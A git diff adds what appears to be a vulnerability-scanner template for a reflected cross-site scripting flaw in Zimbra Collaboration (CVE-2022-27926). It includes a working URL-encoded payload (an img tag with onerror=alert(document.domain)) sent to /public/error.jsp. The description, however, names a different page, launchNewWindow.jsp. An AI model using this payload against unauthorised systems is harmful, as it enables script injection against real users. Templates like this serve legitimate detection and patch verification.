diff --git a/cves/2022/CVE-2022-27926.yaml b/cves/2022/CVE-2022-27926.yaml new file mode 100644 index 0000000000..80a0661799 --- /dev/null +++ b/cves/2022/CVE-2022-27926.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-27926 + +info: + name: Zimbra Collaboration (ZCS) - Cross Site Scripting + author: rootxharsh,iamnoooob,pdresearch + severity: medium + description: | + A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-27926 + - https://wiki.zimbra.com/wiki/Security_Center + - https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24 + - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-27926 + cwe-id: CWE-79 + epss-score: 0.01319 + cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* + metadata: + verified: "true" + tags: cve,cve2022,zimbra,xss,kev + +requests: + - method: GET + path: + - "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Title???' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200